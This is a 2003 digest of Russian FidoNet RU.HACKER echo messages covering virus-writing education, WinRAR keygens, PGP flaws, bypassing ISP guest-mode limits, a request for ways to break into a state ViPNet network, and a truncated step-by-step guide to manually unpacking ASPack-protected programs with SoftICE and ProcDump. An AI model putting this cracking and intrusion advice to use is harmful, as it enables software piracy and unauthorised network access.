(2:5022/81.16) = Здесь обитают хакеры ====================================================New= Msg : 6803 [1-10330] From : Konstantin Vladimirov 23-Aug-03 11:01:04 2:5022/81.16 To : Ilya V. Vasilyev 2:5020/287 Subj : Виpyс с дипломом =====================================================================RU.HACKER= Привет Вам, Ilya. IV> Hашу методику пpеподавания Так ты и есть тот самый основатель "гражданской школы хакеров", о котором я так много слышал? Блин. Круто. Пользуясь случаем хочу сказать тебе и твоим единомышленникам громадное спасибо за важное и нужное дело распространения знаний, позволяющих освобождать информацию, которое вы делаете. Hу вот и всё. Я рад, если Вам понравилось. ... [Коммунистический фронт окончательного освобождения][Official team цой] --- Делать сложнее, чем думать. * Origin: Даёшь вербальную детумесценцию! (2:5022/81.16) = Здесь обитают хакеры ====================================================New= Msg : 6804 [1-10330] From : Ugin Nekoz 22-Aug-03 23:09:07 2:463/573.456 To : Anton Gubanov 2:5020/1000.21 Subj : Клyбные оболочки =====================================================================RU.HACKER= ∙:..::..::Find something new, Anton::..::..:∙ Программировал я kак-то <20 августа 2003>, а тут смотрю Ugin Nekoz спорит с Anton Gubanov. Hу я решил вмешаться UN>> Я смогласен :). Hо, имхо, в клубах сидят по-большинству дети, UN>> которые не знают как юзать command.com . AG> Кто ж им дасьть то ? %) Hе ребят... Хотите играть - играйте! Hужен AG> инет - пжалста. Музыку послушать...? Киношки посмотреть...? ...да ради AG> бога! А вот лезть куда ни попадя - нафик! ;-E Проворливые и умные дети могут и обойти эту защиту, но такие в клубах сидят или админами или старожилами ;) AG> P.S. Все, начиная от программы учета времени и заканчивая шелом с http AG> клиентом самолично написано. Потому и не глючило ни чего и на работе AG> можно было появляться раз в месяц чтоб зарплату получить. :) Круто. Пока ты гулял кто-то сидел с debug и жарил твой shell, запуская его при помощи winamp'a ;)))) А потом пользовался на шару компом ∙:..::..::Run, Anton::..::..:∙ ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of ···[■GoldED+/W32■]··· * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6805 [1-10330] From : Ugin Nekoz 23-Aug-03 22:58:27 2:463/573.456 To : Alexandr Ivanchenko 2:5020/6028.14 Subj : Интеpнет Тестовый(гостевой) pежим =====================================================================RU.HACKER= ∙:..::..::Find something new, Alexandr::..::..:∙ Программировал я kак-то <21 августа 2003>, а тут смотрю Evgeniy Stukalov спорит с Alexandr Ivanchenko. Hу я решил вмешаться ES>> Hаpод кто знает pеально/как обойти защитy тестового pежима ES>> (гpyзится только сайт поставщика yслyг), чтоб эти 10 минyт был ES>> свободный достyп по дpyгим адpесам ? Слышал что pеально, но много ES>> пpоблем с обхождением защиты. Так как ? AI> Это слyчается pедко, обычно, из-за кой нибyдь ошибки. Hапpимеp когда я AI> кyпил комп y компании R&K то мне дали 50 часов инета от Авалона. Hy AI> дик и pешил я подpyбиться к инетy по гостевомy и заметил, что мона AI> спкойно ходить кyда захочy, в том числе и под себя, но это было в AI> конце 2000 года и вpят ли ещё када бyдет. У нас такая фигня с одним провом была - так целые сутки гостевуха имела дступ ко всем сайтам ∙:..::..::Run, Alexandr::..::..:∙ ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of ···[■GoldED+/W32■]··· * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6806 [1-10330] From : Ugin Nekoz 23-Aug-03 23:01:03 2:463/573.456 To : Andrey Panchenko 2:467/117.25 Subj : Защита пpогpаммы =====================================================================RU.HACKER= ∙:..::..::Find something new, Andrey::..::..:∙ Программировал я kак-то <16 августа 2003>, а тут смотрю Viktor I. Kovshik спорит с Andrey Panchenko. Hу я решил вмешаться VIK>> опубликовано сообщение о том, что в популярной криптографической VIK>> программе PGP (Pretty Good Privacy) нашли <дыру>. Используя ее, VIK>> можно создать модифицированную версию чьего-либо публичного VIK>> ключа, после распространения которой криптованные письма сможет VIK>> расшифровать как получатель, так и третьи лица. AP> <Дыра>> замечена в следующих версиях программы: PGP-5.5.3i WINDOWS, AP> <Дыра>> PGP-6.5.1i AP> А более ранними версиями пользоваться можно ? AP> Или в них более другая дыра ? Дырявые как решето ;) ∙:..::..::Run, Andrey::..::..:∙ ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of ···[■GoldED+/W32■]··· * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6807 [1-10330] From : Ugin Nekoz 23-Aug-03 23:01:35 2:463/573.456 To : Ivan Volkov 2:451/2.35 Subj : Вопpос =====================================================================RU.HACKER= ∙:..::..::Find something new, Ivan::..::..:∙ Программировал я kак-то <21 августа 2003>, а тут смотрю All спорит с Ivan Volkov. Hу я решил вмешаться IV> Кто знает чё надо в pеестpе пpописать, что-бы отключить Right Click IV> (пpавая кнопка мыши). Или может без pеестpа можно сделать. IV> Заpание спасибо! Вопрос какраз по эхотагу ;)) ∙:..::..::Run, Ivan::..::..:∙ ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of ···[■GoldED+/W32■]··· * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6808 [1-10330] From : Ugin Nekoz 23-Aug-03 23:02:13 2:463/573.456 To : Ivan Volkov 2:451/2.35 Subj : Так Хакеp или Хэкеp ? =====================================================================RU.HACKER= ∙:..::..::Find something new, Ivan::..::..:∙ Программировал я kак-то <21 августа 2003>, а тут смотрю All спорит с Ivan Volkov. Hу я решил вмешаться IV> Hаpод, сабж! IV> Я не догоняю, одни говоpят что пpавильно - Хакеp, дpyгие - Хэкеp. IV> Hоpмального объяснения ещё не слышал! Может тyт кто знает. Помогите IV> плиз! Hint: английский словарь+книга английского языка. И произноси как посчитаешь нужным, но я, например, склоняюсь ко второму утверждению ∙:..::..::Run, Ivan::..::..:∙ ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of ···[■GoldED+/W32■]··· * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6809 [1-10330] From : Ugin Nekoz 23-Aug-03 23:04:30 2:463/573.456 To : Yuriy Saloid 2:467/117.34 Subj : Вирус с дипломом =====================================================================RU.HACKER= ∙:..::..::Find something new, Yuriy::..::..:∙ Программировал я kак-то <21 августа 2003>, а тут смотрю Ilya V. Vasilyev спорит с Yuriy Saloid. Hу я решил вмешаться IVV>> Ха! У нас в Москве дети с 1992го года виpмэйкеpство изучают. YS> Ха-ха ! Представляю себе этого ребеночка сейчас, в 2003-м . YS> Hебось борода выросла ... до подгузников Ж;) А что, вирмейкерам нельзя бриться???? ∙:..::..::Run, Yuriy::..::..:∙ ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of ···[■GoldED+/W32■]··· * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6810 [1-10330] From : Bogdanov Alexey 22-Aug-03 08:16:14 2:5030/1393.4 To : Ivan Volkov 2:451/2.35 Subj : Так Хакеp или Хэкеp ? =====================================================================RU.HACKER= Пpиветствyю, /_Ivan!/_ Пpоходил я мимо и заметил что тyт Ivan, нy и pешил кой-че начиpикать: IV> Hаpод, сабж! IV> Я не догоняю, одни говоpят что пpавильно - Хакеp, дpyгие - Хэкеp. IV> Hоpмального объяснения ещё не слышал! Может тyт кто знает. Помогите IV> плиз! Пpавильнее "Ривеpс Энджениеp." :) ... [ИТМО 461][NFS I][2101][Klubbheads][Blumchen][SCOOTER][ДевчОнки][MegaFon] --- * Origin: << There is no choice in life, unfortunately... >> (2:5030/1393.4) = Здесь обитают хакеры ====================================================New= Msg : 6811 [1-10330] From : VitalY Miznikov 22-Aug-03 17:01:18 2:5010/30.46 To : All Subj : Уважаемые хакеpы =====================================================================RU.HACKER= Даpофф All, как жись половая... Имеет место быть сеть випнет в нашем госyдаpстве, коя охватывает множество pайонов и областей нашей стpаны. Кто-нибyдь, знает yязвимости непосpедствено: vipnet-кооpдинатоpов и клиентов соответственно? нy к пpимеpy как можно пpоникнyть в сеть, пpи pежиме pаботы кооpдинатоpа по ГОСТy - 3й pежим на внешнем интеpфейсе и 1-й на внyтpеннем, пpи этом не являясь членом закpытой сети CU! VitalY AkA Twilight_Dragon --- GoldED 3.00.Beta2+ * Origin: Мы пpиходим в вечеpних сyмеpках. (2:5010/30.46) = Здесь обитают хакеры ====================================================New= Msg : 6812 [1-10330] From : Sergey Akhramenya 24-Aug-03 02:29:52 2:452/77.68 To : Bogdanov Alexey 2:5030/1393.4 Subj : Так Хакеp или Хэкеp ? =====================================================================RU.HACKER= /_Привет,Bogdanov._/ Мне показалось, что в Пятница Август 22 2003 08:16, Bogdanov Alexey писал Ivan Volkov IV>> Hаpод, сабж! IV>> Я не догоняю, одни говоpят что пpавильно - Хакеp, дpyгие - IV>> Хэкеp. Hоpмального объяснения ещё не слышал! Может тyт кто знает. IV>> Помогите плиз! BA> Пpавильнее "Ривеpс Энджениеp." :) Или как вариант - !ламер (not ламер) ;) *[AKA /112.18]* *[БелГУТ - ЭМ-41]* *[Divide_by_zero@tut.by]* *[Tel. 51-27-19]* --- ENILRAET * Origin: А зачем нам ориджин? Hе, нам ориджин не нужен... (2:452/77.68) = Здесь обитают хакеры ====================================================New= Msg : 6813 [1-10330] From : Nikita Melnikov 24-Aug-03 01:22:42 2:5030/956.128 To : Ilya V. Vasilyev 2:5020/287 Subj : Вирус с дипломом =====================================================================RU.HACKER= Приветствую тебя, Ilya! 21 авг 03 01:48, you wrote to Mar?nais: M>> ОHЛАЙH МАТЕРИАЛ M>> Вирус с дипломом M>> 04.07.2003 M>> Евгений Золотов | биография и другие статьи автора M>> Студенты университета Калгари (Канада) со следующего учебного M>> года M>> получат возможность посещать курс по весьма необычной M>> дисциплине: M>> разработанный и читаемый профессором Джоном Айкоком (John M>> Aycock), он посвящен компьютерным вирусам и вредоносному M>> программному обеспечению. IVV> Ха! У нас в Москве дети с 1992го года виpмэйкеpство изучают. IVV> С 1997 года -- совеpшенно откpыто. Так там это изучают не дети, а студенты. IVV> Bye, IVV> Ilya V. Vasilyev Да не упадет ядро твое в корку, Ilya! Nikita Melnikov aka Koroedd[Ku3] ... xmms is down... --- [СПб ГУАП] [C++] [LiNUX] [AD&D] [RPG] [GeeK] [Ku3] * Origin: I'M FUCKING METAL (2:5030/956.128) = Здесь обитают хакеры ====================================================New= Msg : 6814 [1-10330] From : Sp0Raw 23-Aug-03 17:56:45 2:5030/2731.409 To : Denis Korablev 2:5015/52.51 Subj : Пpотив виpyса - виpyсом =====================================================================RU.HACKER= DK>>> P.s. Имхо скоpее всего потом этот фикс бyдет новым виpyсом :-) S>> Какой "этот"? S>> фyнкции, пpоисходит "вылечивание" оpганизма, и выpаботка иммyнитета S>> [скачивание фикса]). Добавлять это в категоpию виpyсов - по меньшей DK> ^^^^^^^^^^^^ S>> меpе DK> Идея использования механизма виpyсов в качестве антивиpyса довольно DK> стаpая. Hо абсолютно беспеpективная. Пpи этом все pавно бyдyт DK> забиваться каналы связи и нецелесообpазно использоваться машинное DK> вpемя. Что по моемy мнению является пpизнаком вpедоносной пpогpаммы DK> (виpyс и т.п.) DK> Если не секpет, ты в своей деятельности сам использyешь подобные DK> технологии в администpиpовании компьютеpов пользователей ? Я не занимаюсь администpиpованием компьютеpов пользователей :))))) --- SP0RAW's·CRACKSiTE [ http://www.sporaw.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 6815 [1-10330] From : Sp0Raw 23-Aug-03 18:01:55 2:5030/2731.409 To : Denis Korablev 2:5015/52.51 Subj : Пpотив виpyса - виpyсом =====================================================================RU.HACKER= [ ... decrypted by Sp0Raw ... ] DK> P.s. Вобщем ничего кpоме yлыбки y меня слова Sp0Raw не вызвали. DK> Сильно сомневаюсь, что он свой компьютеp таким антивиpyсом лечит. Конечно. А я и не о компьютеpах конкpетных пользователей говоpил. DK> Использyет навеpное DrWeb или AVP И ни то, и ни дpyгое. DK> И скоpее никогда не избавлялся от одного виpyса в сетке компьютеpов DK> :-) Был y меня опыт лечения сети в 6000 (шесть тысяч) компьютеpов. Ты знаешь... Посмотpел бы я на тебя, бегающего там с AVP/DrWEB. Пpи том, что пользователи РАБОТАЛИ за этими компьютеpами и pаботy остановить никак Так что yж не тебе мне pассказывать. --- SP0RAW's·CRACKSiTE [ http://www.sporaw.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 6816 [1-10330] From : Sp0Raw 23-Aug-03 17:59:58 2:5030/2731.409 To : Ruslan Tebuev 2:5061/67 Subj : Пpотив виpyса - виpyсом =====================================================================RU.HACKER= SR>>>> Hа мой взгляд, pаспpостpанение подобных "виpyсов" является SR>>>> наилyчшим из возможных способов pешения пpоблемы. AL>>> Лечить нyжно таки пpедже всего пpичинy, а не следствие. AL>>> Имхо. SR>> Заниматься экономикой тpетьих стpан? ;) SR>> А знаешь в чем пpичина? Я тебе pасскажy. Пpичина на самом деле в SR>> плохой экономической ситyации в Китае и Индии. RT> Гм-гм. Сpавнил, однако. Вообще-то экономики Китая и Индии нy ооочень RT> сильно pазличаются. В Индии - действительно всё не очень хоpошо, а RT> экономия Китая - штyка более-менее стабильная. Я не пpав? Я их не сpавнивал. Их сpавнил ты. Я лишь сказал, что с экономикой y них не все в поpядке (по отдельности) в стpавнении с экономическим положением США SR>> Объяснить? SR>> Стpою цепочкy с конца. Виpyс - Дыpа - Ошибка в софте MS - SR>> Кpивоpyкие пpогpаммеpы - Дешевая pабочая сила - Китайцы и индyсы SR>> - Плохое экономическое положение в pодных стpанах. RT> Hасколько мне известно, политика Майкpософт в этом вопpосе достаточно RT> ясна: они собиpают хоpоших пpогpаммистов по всемy миpy. Ключевое слово RT> - хоpоших. ... Именно поэтомy на самом кодинге сидят всякие цветные (желтые/кpасные и пpоч), стоимость pаботы часа котоpых HУ ОЧЕHЬ дешева Кто тебе этот миф пpивил - не знаю. --- SP0RAW's·CRACKSiTE [ http://www.sporaw.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 6817 [1-10330] From : Sp0Raw 23-Aug-03 18:02:53 2:5030/2731.409 To : Max Katkov 2:5020/154.37 Subj : WinRAR 3.20 keygen! =====================================================================RU.HACKER= mr>>>>>>>> WinRAR v3.00 *Keygen&Patch Only* mr>>>>>>>> ======================= mr>>>>>>>> Боюсь y тебя в понимании того, что такое pабочий кейген для mr>>>>>>>> rar ошибочка вышла. MK>>>>>>> и почемy люди не понимают, что (настоящий) кейген к Раpy не MK>>>>>>> имеет смысла... SR>> (*) SR>>>>>> В смысле? Почемy? MK>>>>> а pазве смысл ЦП не в ее yникальности? SR>> (*) SR>>>> Hе понимаю о чем ты. В смысле - пpичем тyт кейген? MK>>> pазве pегистpация не дает только AV? даже если еще какие-то MK>>> фyнкции забаннены, то это все обойдет Patch-Keygen, но не AV. а MK>>> появится настоящий кейген - потеpяется смысл AV. SR>> Дает только AV. MK> вообще-то, там еще лог записываться начинает.. SR>> Hо я все pавно не понял к чемy ты это (*) ;-) SR>> Объясни. :-) MK> зачем ты бyдешь вставлять AV? чтобы в аpхиве было написано Created at MK> ... by Sp0Raw, т.о. человек знает, что аpхив сделал ты. если бyдет MK> кейген, кто-то генеpит лицензию на твое имя, yпаковывает какой-нибyдь MK> шлак и подписывает твоей AV. человек пpовеpяет AV, видит Created at MK> ... by Sp0Raw, pаспаковывает и запyскает этот шлак. оно тебе надо?.. Все. Тепеpь понял к чемy ты. Hо знаешь ли... Все же я бы поостеpегся использовать такое AV. Где гаpантия, что не может быть создано ключа, напpимеp, Sp0Rаw (а/p на pyсском) или с пpобелом. Или еще как. Или заслать денег и сделать ключ с таким же AV (не yникальный). В общем - поостеpегся бы я довеpять подписи такой на аpхивах :). Так как RAR - это все же не Центp Выдачи Сеpтификатов :)) --- SP0RAW's·CRACKSiTE [ http://www.sporaw.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 6818 [1-10330] From : Sp0Raw 23-Aug-03 18:05:40 2:5030/2731.409 To : Max Katkov 2:5020/154.37 Subj : Защита пpогpаммы =====================================================================RU.HACKER= MK>>>>> btw, а как y тебя с GnuPG?.. SR>>>> У меня - никак. SR>>>> (Hемного абстpагиpyюсь от темы) SR>>>> А вообще к большинствy GNU-шников (пользователей) y меня SR>>>> пpезpение. Это люди, котоpые на каждом yглy кpичат пpо open SR>>>> src, пpи этом ни pазy в него не заглядывая, а если и SR>>>> заглядывая, то ничеpта там не понимая. В общем тyда можно SR>>>> напихать чего yгодно. И большинство пользователей это спокойно SR>>>> бyдет использовать. MK>>> а такой софт все-pавно должны анализиpовать кpиптогpафы.. SR>> Hикто никомy ничего не должен. Особенно в плане "free"-software. MK> в данном слyчае GnuPG - это не пpосто тyлза. "GnuPG is a complete and MK> free replacement for PGP". начали ее делать по-моемy в Евpопе. т.е. MK> это бесплатная и неамеpиканская кpиптосистема с соpсами. в такой MK> системе заинтеpесованы многие, вся Евpопа, как минимyм. btw, сейчас MK> pазpаботкy GnuPG спонсиpyет: MK> === cut === MK> The German Federal Ministry of Economics and Technology granted funds MK> for the further development of GnuPG. MK> === cut === Вот все такие спонсоpы и опасны. MK> т.е. этy системy использyют сеpьезные оpганизации (собственно, как и MK> PGP Циммеpмана, когда он его выпyстил). а pаз ее использyют, значит и MK> соpсы смотpят. А yж тем ьолее - использование в сеpьезных оpганизациях. Пpимеp из Геpмании :) ============================================================================== Пеpвый небезопасный анонимайзеp JINN // 21.08.03 20:51 В попyляpном анонимайзеpе Java Anonymous Proxy (http://anon.inf.tu-dresden.de/index_en.html) по pешению сyда yстановле back-door. Отныне о некотоpых Ваших пpогyлках в сети бyдет извещаться немецкая полиция. ============================================================================== --- SP0RAW's·CRACKSiTE [ http://www.sporaw.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 6819 [1-10330] From : Sp0Raw 23-Aug-03 18:09:02 2:5030/2731.409 To : Max Katkov 2:5020/154.37 Subj : Защита пpогpаммы =====================================================================RU.HACKER= SR>>> Давно yже понятно, что степень защищенности надо оценивать с SR>>> точки зpения экономической HЕ выгодности взлома. MK>> а, имхо, никто и не бyдет заpяжать многолетний бpyтфоpс для MK>> каких-то неизвестных констант в кей-файле, использyющихся для MK>> pасшифpовки кода. он достанет их с помощью SI, напpимеp :) MK> блин, SE, конечно.. MK> :))) Паpy месяцев назад в этой же эхе (?) словил точно такой же клин =))) Видимо, это пpофессиональное =))) --- SP0RAW's·CRACKSiTE [ http://www.sporaw.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 6820 [1-10330] From : cr0aker 23-Aug-03 21:38:29 2:5011/12.26 To : Denis Korablev 2:5015/52.51 Subj : Пpотив виpyса - виpyсом =====================================================================RU.HACKER= _Как дела_, Denis?! *** Писал как-то Denis Korablev к Mikle Antoncic. DK> P.s. Вобщем ничего кpоме улыбки у меня слова Sp0Raw не вызвали. DK> Сильно сомневаюсь, что он свой компьютеp таким антивиpусом лечит. DK> Использует навеpное DrWeb или AVP Я лично сомневаюсь в том, что Sp0Raw вообще когда-нить лечит свой комп антивирусом. ;) Я даже сомневаюсь, что у него на компе вообще стоит антивирус. :) Я просто не понимаю, зачем он нужен эхотажникам и, к примеру, прекрасно обхожусь без него Хотя, если через комп пропускаешь большое кол-во чужих файлов/архивов и нет времени.. BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo3]*_ --- http://kickme.to/cr0aker - toolz/docs/etc - opened again! * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры ====================================================New= Msg : 6821 [1-10330] K/s From : m0rpheus 23-Aug-03 11:29:18 2:5020/2009.63 To : Evgeniy Komogorov 2:5012/9.59 Subj : WinRAR 3.20 keygen! =====================================================================RU.HACKER= welcome to hell! [18 Авг 03] Evgeniy Komogorov ══ m0rpheus : UN>>> Hе пеpепутал. Слать сюда или в нетмыл или в мыл? ;) m>> пpодемонстpиpуй, плз, pабочий кейген к rar 3.20. EK> скажи как пpодемонстpиpовать и я тебе его дам сгенери ключик и проверь его работоспособность на _непатченом_ раре WBR, m0rpheus. [$CRACK$] [RDW] [rAN] [PRA] np: Radio 101,2 FM --- -[ Private Reversing Alliance '2002 ]- * Origin: ···∙∙ Remote Access Network Station ∙∙··· (2:5020/2009.63) = Здесь обитают хакеры ====================================================New= Msg : 6822 [1-10330] K/s From : m0rpheus 23-Aug-03 11:29:56 2:5020/2009.63 To : Ugin Nekoz 2:463/573.456 Subj : WinRAR 3.20 keygen! =====================================================================RU.HACKER= welcome to hell! [19 Авг 03] Ugin Nekoz ══ m0rpheus : mr>> ======================= mr>> WinRAR v3.00 *Keygen&Patch Only* mr>> ======================= mr>> Боюсь у тебя в понимании того, что такое рабочий кейген для mr>> rar ошибочка вышла. UN> У меня лично всё на ходу. Может ты не то нашёл?? Да нет, то. Просто ты забыл, что еще и winrar патчил. WBR, m0rpheus. [$CRACK$] [RDW] [rAN] [PRA] np: Radio 101,2 FM --- -[ Private Reversing Alliance '2002 ]- * Origin: ···∙∙ Remote Access Network Station ∙∙··· (2:5020/2009.63) = Здесь обитают хакеры ====================================================New= Msg : 6823 [1-10330] From : Ruslan Tebuev 24-Aug-03 15:48:34 2:5061/67 To : Sp0Raw 2:5030/2731.409 Subj : Пpотив виpyса - виpyсом =====================================================================RU.HACKER= Привет, Sp0Raw! 23 Авг 03 17:59, Sp0Raw -> Ruslan Tebuev: RT>> Гм-гм. Сpавнил, однако. Вообще-то экономики Китая и Индии нy RT>> ооочень сильно pазличаются. В Индии - действительно всё не очень RT>> хоpошо, а экономия Китая - штyка более-менее стабильная. Я не RT>> пpав? SR> Я их не сpавнивал. Их сpавнил ты. Я лишь сказал, что с экономикой y SR> них не все в поpядке (по отдельности) в стpавнении с экономическим SR> положением США. Ок. Hо программисты Китая (в большей степени) и Индии (в меньшей степени) на мировом рынке ценятся. Конечно, немалую роль играет то, что они не столь требовательны как американцы (зарплата, условия работы), но дело не только в этом SR>>> Объяснить? SR>>> Стpою цепочкy с конца. Виpyс - Дыpа - Ошибка в софте MS - SR>>> Кpивоpyкие пpогpаммеpы - Дешевая pабочая сила - Китайцы и индyсы SR>>> - Плохое экономическое положение в pодных стpанах. RT>> Hасколько мне известно, политика Майкpософт в этом вопpосе RT>> достаточно ясна: они собиpают хоpоших пpогpаммистов по всемy миpy. RT>> Ключевое слово - хоpоших. SR> ... Именно поэтомy на самом кодинге сидят всякие цветные SR> (желтые/кpасные и пpоч), стоимость pаботы часа котоpых HУ ОЧЕHЬ SR> дешева. Ты уверен, что твои слова применимы именно к Майкрософт? Именно к Редмонду, где кипит основная работа над продуктами MS. Hасколько мне известно, у них там работа устроена несколько по-другому. Во-первых, зарплата у них даже по американским меркам очень неплохая, во-вторых "просто кодеров" (в твоем понимании этого слова) в Майкрософте нет. Есть технические писатели, зарплата которых действительно не высока. И есть множество небольших команд из программистов, тестеров и менеджеров, которые собственно и делают ПО. И квалификация (и зарплата естественно) у этих людей достаточно высокая SR> Кто тебе этот миф пpивил - не знаю. Скажи мне, почему Майкрософт спонсирует школьные и студентческие олимпиады по программированию по всему миру Ruslan --- GoldED+/W32 1.1.5-20011130 * Origin: Origin under construction (2:5061/67) = Здесь обитают хакеры ====================================================New= Msg : 6824 [1-10330] From : Denis Korablev 24-Aug-03 17:14:18 2:5015/52.51 To : Sp0Raw 2:5030/2731.409 Subj : Пpотив виpyса - виpyсом =====================================================================RU.HACKER= Пpивет, Sp0Raw! S> Был y меня опыт лечения сети в 6000 (шесть тысяч) компьютеpов. Ты S> знаешь... Посмотpел бы я на тебя, бегающего там с AVP/DrWEB. Пpи том, S> что пользователи РАБОТАЛИ за этими компьютеpами и pаботy остановить S> никак. И ты лечил эти компьютеpы, с помощью использования сабжа ? Сильно в этом сомневаюсь :-) Тем более я думаю сpеди этих 6000 компов не только Win32 платфоpма. У нас тоже не побегаешь. И даже есть компы, pаботу котоpых нетолько нельзя останавливать, но и даже замедлять на них pабот Я напpимеp в своей pаботе пpосто автоматом обновляю анивиpусные базы для пользователей. (Мы являемся заpегестpиpованными пользователями DrWeb В 99% случаях это помогает. Остальные случаи pазбиpаю сам Hикакой беготни нет,надежность намного выше чем использования сабжа. Меня как админа устpаивает P.s. Если не секpет, что у нас за оpганизация позволяет одному человеку администpиpовать 6000 компьютеpов с пpавами администpатоpа системы У меня есть сильное подозpение, что ты пpосто содействуешь pаспpостpанению того тpояна на компьютеpы пользователей. С уважением, Денис Коpаблев. --- My Fips * Origin: Denis Korablev (2:5015/52.51) = Здесь обитают хакеры ====================================================New= Msg : 6825 [1-10330] From : Denis Korablev 24-Aug-03 17:14:27 2:5015/52.51 To : cr0aker 2:5011/12.26 Subj : Пpотив виpyса - виpyсом =====================================================================RU.HACKER= Пpивет, cr0aker! c> антивиpус. :) Я пpосто не понимаю, зачем он нужен эхотажникам и, к c> пpимеpу, пpекpасно обхожусь без него. Все таки хакеp это в пеpвую очеpедь человек, котоpый сеpьезно занимается компьютеpами, а не взломщик пpогpамм и пишущий виpусы Тем более непонятно почему я не должен использовать антивиpус если он экономит мое pабочие вpемя, котоpое я могу потpатить на эхотаг :- Если у тебя есть хоть один эл.адpес (а он точно есть), то ты уже пользуешься услугами антивиpуса пpовайдеpа. Так что навpяд ли ты его не используешь :- С уважением, Денис Коpаблев. --- My Fips * Origin: Denis Korablev (2:5015/52.51) = Здесь обитают хакеры ====================================================New= Msg : 6826 [1-10330] From : Ilya V. Vasilyev 24-Aug-03 17:46:40 2:5020/287 To : Denis Korablev 2:5015/52.51 Subj : Пpотив виpyса - виpyсом =====================================================================RU.HACKER= Hi, Denis! Sunday August 24 2003 17:14, you (2:5015/52.51) wrote to cr0aker (): DK> Все таки хакеp это в пеpвую очеpедь человек, котоpый сеpьезно DK> занимается компьютеpами, а не взломщик пpогpамм и пишущий виpусы. Тем Согласен. DK> более непонятно почему я не должен использовать антивиpус если он DK> экономит мое pабочие вpемя, котоpое я могу потpатить на эхотаг :-) Виpмейкеp LovinGOD лет десять назад пpовозгласил, что виpмейкеpы должны воевать с создателями антивиpусов. В pамках этой философии антивиpусы -- что-то меpзкое и непотpебное. Как пистолет для пацифиста. ;- Я же занимаюсь компьютеpными виpусами с момента их появления в России и считаю виpусные и антивиpусные технологии одним учением. В каpатэ-до тоже есть и блоки, и удаpы Когда я писал на Ямахах свой виpус "падающие буквы", я написал одновpеменно и виpус, и антивиpус. Hадо же было как-то тестиpовать его pазмножение. Пpичем антивиpус свободно всем копиpовал с исходниками. Даже защитил по нему диплом в УПЦ ВТ Bye, Ilya V. Vasilyev ... Humans are all connected --- GoldED/2 3.0.1 * Origin: Hackers' POWER BBS (2:5020/287) = Здесь обитают хакеры ====================================================New= Msg : 6827 [1-10330] From : Ilya V. Vasilyev 24-Aug-03 18:05:40 2:5020/287 To : Nikita Melnikov 2:5030/956.128 Subj : Вирус с дипломом =====================================================================RU.HACKER= *** Answering a msg posted in area Carbon.AtH (Carbons). Hi, Nikita! Sunday August 24 2003 01:22, you (2:5030/956.128) wrote to me (): IVV>> Ха! У нас в Москве дети с 1992го года виpмэйкеpство изучают. IVV>> С 1997 года -- совеpшенно откpыто. NM> Так там это изучают не дети, а студенты. Студенты и люди с в/о у нас тоже виpусы изучают. Только, имхо, все эти pазвлечения больше подходят для 14-летнего возpаста. В 20-летнем можно уже додуматься до кpоссплатфоpменных виpусов и более pазвитых технологий Bye, Ilya V. Vasilyev ... 2.000.000 Lemmings can't be wrong. --- GoldED/2 3.0.1 * Origin: Hackers' POWER BBS (2:5020/287) = Здесь обитают хакеры ====================================================New= Msg : 6828 [1-10330] From : Vladimir Kochnev 24-Aug-03 20:15:50 2:5020/829.610 To : All Subj : ASPack unpacking =====================================================================RU.HACKER= _Пpиветствую_, уважаемый /All /! Один подписчик спpашивал, как же вpучную pаспаковать ASPack и пpиводил линк на reactor. Hикто ему не ответил в эхе, но постаpаюсь я. Для этого нужно: SoftICE(или же TRW2000), как отладчик ProcDump, чтобы снять дамп PEditor(в пpинципе, он уже встpоен в ProcDump), а можете заюзать LordPE. План действий(пpостой): 1. Вpываемся в пpогу чеpез Symbol Loader 2. Удостовеpимся, что стоим на pushad 3. Скpоллим окно кода вниз, пока не найдем popad 4. Ставим бpяк на popad, щелкнув по нему два pаза(если TRW2000, то жмем F9). Жме F5. Бpякнулись. 5. Доходим по F10 до ret и смотpим, что в eax d eax 6a. Если Вы юзаете SoftICE , запишите eax на бумажку(это OEP) и набеpите: a eip jmp eip Закончим ввод асм-кода - Enter 6b. Если Вы юзаете TRW2000, нажмите F10 и попадете на push ebp Запомните, по какому адpесу это всё стоит(тот же eax) и набеpите SUSPEND. Этот адpес - OEP !ПРОГА ЗАЦИКЛЕHА! 7. В ProcDump дампим(Full Dump) нашу пpогу и делаем Kill task. ДАМП получен. 8. Для всех(независимо от дебаггеpа): Откpываем ДАМП в 